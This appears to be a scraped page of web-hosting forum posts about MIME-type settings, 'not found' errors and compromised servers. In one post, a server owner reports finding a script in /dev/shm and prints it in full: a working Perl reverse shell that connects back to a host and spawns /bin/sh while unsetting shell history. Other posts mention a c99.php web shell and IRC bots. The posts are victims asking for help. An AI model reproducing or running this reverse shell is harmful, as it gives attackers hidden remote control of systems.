--with-mime-magic: Not Found
Mar 25, 2007any hints on the reason of "--with-mime-magic: not found" when compiling PHP?
FreeBSD 6.1
any hints on the reason of "--with-mime-magic: not found" when compiling PHP?
FreeBSD 6.1
how to set magic quotes off in Cpanel
for a specific user
I am undergoing "amazing" Bandwidth thief issue. My Server is using very high bandwidth from last 7 days -
On Scanning server, i found following
1) Roundcube mail script was compromised and used by some hacking group, so i deleted that directory all together
2) I disabled Hotlinking all together
3) I found "Live Chat" script also being compromised, and found movies (.dat files) in
it amounting to 20 GB++ , i also deleted that directory
4) I have checked for each and every file, with size more than 30 MB on server.
5) I have also switched off FTP service (and there is no other user on server too)
6) After all this, i even installed "mod_bandwidth" and limited bandwidth service to 10 KBPS across domain directory
Then, i installed MRTG graphs to analyze the issue, and to my SURPRISE, nothing changed, it still used very high bandwidth, after few - few hours.
http://img208.imageshack.us/img208/511/indexday.png
^^ the above image shows B/W goes upto 10 MBPS and thus breaks network.
I am now tired and exhausted of this. Can someone here, please give an expert advice on this issue?
I have a problem with a .dat file on my webserver. It seems to download correctly (I have added the mime type), but my application refuses to use/read the file correctly.
This is moving from an Apache server, where it worked perfectly, to IIS6. Apache reported the mime as text/plain, whereas I've tried both this and application/octet-stream on IIS.
The dat-file is actually a ZIP password protected file containing an XML-file.
Could there perhaps be some issues with dato format? I'm most greatful for any insigth into the matter.
I have an IIS 6 website with a strange problem. All content types are sent as text/html. For example, jpegs, gifs, and others all are listed as text/html when I do a header check. Anyone ever seen this or know what might cause it?
View 2 Replies View RelatedWhenever I try to validate a page on my website it says it's invalid because the mime type is incorrect.
If I add this code to the top of the page:
PHP Code:
<?php
header("Content-Type: text/html");
?>
The page then becomes valid.
How can I update the mime type on the server so that I wont have to add this code to every page?
My server is a VPS running Apache with Plesk. I have SSH access.
Some articles on the Net seem to suggest (may be I have misunderstood it) that S/MIME, which uses x.509 certificates is better for implementing secure email as the sender can use the x.509 cert to encrypt and digitally sign the messages and the recipient only needs an email client that implements x.509.
Is this true? Or, will key pairs still need to be generated and the public key shared with the recipient in advance even when using S/MIME?
I've got mod_deflate set up with Apache with the following line in httpd.conf:
Code:
<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css application/x-javascript
</IfModule>
It works well, for most things.
The issue I'm having is that mod_deflate is compressing binary data, outputted from PHP scripts as well (undesirable).
The script sends a Content-Type: application/octet-stream header, so I'm guessing that mod_deflate is simply not looking at headers generated by the script before compressing output.
I've even changed the default MIME type for Apache to application/octet-stream but to no avail.
Note that static content which has a defined MIME type doesn't get compressed - it's only the output generated by scripts.
Also, there is no defined MIME type for the .php extension.
I've also tried to disable the filter for certain directories, however, Apache doesn't seem to have an opposite to AddOutputFilterByType (although it does for AddOutputFilter (RemoveOutputFilter)). Also, I can't seem to stick in a negative <Directory> command either, which is a pain :/
i run an Internet radio station, and my current web host doesn't support the MIME Types i need for people to be able to click on the links to listen to it
so im looking for a new web host with cpanel preferably. and supports these MIME Types
PLS - audio/x-scpls
ASX - video/x-ms-asf
I'm running plesk 11.5.30 and I'm having an issue with the new word doc format (.docx) being recognized as a zip file. I've read several posts that explain what mime types to add, and I've found the spot where I need to enter them. The part I'm not sure about is whether the custom mime types field is an addition to the current mime types or a replacement list. Does that field just needs the new mime types or a full list?
View 1 Replies View RelatedFound a suspicious script running on a server in /dev/shm
Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007
";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]
";
die "Ex: $0 127.0.0.1 2121
";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host
";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host
";
print "[*] Connecting... $ARGV[0]
";
print "[*] Spawning Shell
";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )
We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.
This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:
This site may harm your computer.
After about a week of trying to rectify the problem himself, he contacted us.
He provided us FTP access to his site so we could tackle it.
After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):
Code:....
I have a valid ssl certificate for the website but it still shows address not found error. But sometimes it just works fine.
is it related to dns issue?
I do not know where to post this, I recently changed Hosts.
My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?
On my end I get Server Not Found?
I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...
For the first time after running a server for about a year I decided to buy a new server and in it I found out that there is a some sort of infection in it. What should I do next. The logs are attached in a n attachment.
Attached Files
rootkit.log.txt (9.4 KB, 70 views)
I cant visit my website! <snipped> everytime I go it says server not found. So I told some friends to go and they are able to see and visit <snipped> How is that possible?? They could and I cant? Yesterday same thing but then couple hours later it worked I could visit hmlegends.com but i didnt do anything and now today same thing server not found! i cleaned my history everything and still server not found!
So what I did is used a proxy <snipped> and then it worked!
But then I dont use a proxy SERVER NOT FOUND! Its like my IP cant reach hmlegends.com
I dont know how to solve this?!?? It just says server not found!
But it looks like everyone else could access it!
Anyways im using Firefox 2 but then maybe i thought it was my browser so switched to 3 so currently on firefox 3
and no its not its something with my IP cuz when i use proxy i could go to my site
but point is i dont wanna use proxy i wanna use my IP to go to hmlegends.com
Also im using Dial Up Internet!
I use AOL Dialer to connect!
Aol Dialer 4.8.8.4
I have recently brought a VPS hosting package. At the moment I am going through the tutoritals on the net that I have researched before getting a VPS package to give me some understanding on what I need to do to securior the server and also how to install the software that I require.
For most of today, I have been trying to sort out a problem that I am currently having.
Of which is I am trying to sort out a part of the tutorial from a website that requires the use of apt commands.
But for every command I am getting the message back apt..... Command not found. I am currently using the ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.
Would I be right, and with the bare installation apt commands wouldn't be installed?
If I am, how would I go about installing the Apt commands and anything else that I might require?
I got a new BOX, i see 'cronjob' not working,
cronjob
-bash: cronjob: command not found
I installed
yum install vixie-cron.i386
Still
cronjob
-bash: cronjob: command not found
# cron
-bash: cron: command not found
how can i get 'cronjob' working?
I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory
When a user tries to access a script or even a standard text file, it throws up the error..
Not Found
The requested URL /cgi-bin/first.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When they try and access the cgi-bin directory itself, they get
Forbidden
You don't have permission to access /cgi-bin/ on this server
Now, I've checked the httpd.conf file and this is what it has for Cgi-bin
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
And the error logs say..
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt
The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group
while am installing some programs there is some problem in my php
PHP GD Module Not Found
how could i install it in SSH root?
After going back and forth with the folks that are supposed to be managing my server they finally checked and found an irc bot. Here is their message:
I have found a irc bot running on your server. The binaries are located at /var/lib/texmf/.dat/. You can see the tar file which the hacker uploaded at /var/lib/texmf/. I have changed the permissions to 000 so that you can verify the files.
The user of the files are nobody. Hence it is clear that the files were uploaded via url injection using some vulnerable script under some domain. Unfortunately there are no helpful logs to find the exact domains and the vulnerable script. It is certain that the files were first uploaded to /tmp and then moved from there. You can see some similar hack files at /tmp/.dat, /tmp/var and /tmp/.dev12. Also the permission of /var/lib/texmf/ was 777.
You should update all your web softwares to latest version so that they will include latest security patches. Also I will recommend you to enable mod_security in your server to prevent further hacks.
Let us know if you want this to be enabled.
Our Security Technician found yesterday a 200 user botnet on a hidden IRC server and was able to quickly email the compromised systems information (just hostname) to our abuse email. So today i spent the last 2 hours sending emails off to web hosting companies, educational institutions and corporate companies telling them that their systems have been compromised, we regulary email out systems we have found compromised. The thing that stuns me is that most of the systems we found compromised on IRC are dedicated lines between 10MBPS to 1GBPS... I found a few hosting companies and will list them so they can be found by them:
lvps212-241-192-85.vps.webfusion.co.uk
wp056.webpack.hosteurope.de
wp097.webpack.hosteurope.de
wp049.webpack.hosteurope.de
wp055.webpack.hosteurope.de
m2.wrango.com - Dedicated Server with NetworkSolutions
server1.hostfree.com.br
My server use cPanel 10x
CentOS
how to fix this problem?
php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)
I just found a script on a customers account after some problems they were having, they mentioned injecting php code, that immediately threw up a red flag, when i took a look i found c99.php
I checked up and this seems to be the web equivalent of a rootkit.
Are there any legitimate reasons for this script? The customer is one of the strangest i've came accross because he had the lowest fraud score yet, used a Lady's name at signup/payment, yet calls himself Michael and seemed to do something with WHMcs security wise.. i dont want to post details as checks are still ongoing but it seems to be a problem with Language scripts and the customer was able to sign up on a monthly plan but Biannually... so no more invoices till 2009 ... strange, although wether innocently this was done or is a known security hole in WHMCS is not known yet.
after a day of crappy performance from one of my VPS accounts, I decided to start digging, and found eggdrop, and couple of other not so nice files in my /tmp directory.
I panicked, of course, and removed all traces of anything I could find that was bad, so I've unfortunately got no way to see how it happened, as far as I know (but I'm far from a security expert)
I need your help in shutting the system down to users. This is an HTTP/SSH/SMTP/POP3/IMAP server.
Tell me what you need to know and I will do my best to get it to you. Basically I'm just frustrated that I've been on it for 3 hours now.....wasting time because some SOB was bored....
How can I found the spammer on our server?
one of our customer trying to send mail with a PHP file! but I cannot found this account, can you help me to found this user?
I'll try to make this long story short, but this morning I logged into one of my servers and it showed a read-only filesystem, which I thought my server guys could fix easily. So I put in a ticket. 6 hours later, they tell me that they think the OS is corrupted and I need a new install. They give me KVM over IP so I can go in and 'do' things. I tried to log in as root and it wouldn't let me, so they finally booted in single mode and I can get in and such. When I try to su - root, it tells me that user root can't be found. I also tried to ftp into and out of the server with no luck. I really need this box back up. If not, I need to get all the accounts saved off so that I can build a new box. Everything is there, so I don't want to give up yet.
View 10 Replies View RelatedWhen I was a customer at hostgator, whenever a terminating error within php was displayed it would log in the parent directory in a file called "error_log".
I want this to happen now on our dedicated server. I've looked at my local apache error log and it doesn't appear to show the same info as hostgator's setup showed.
Can anyone tell me how to set that up?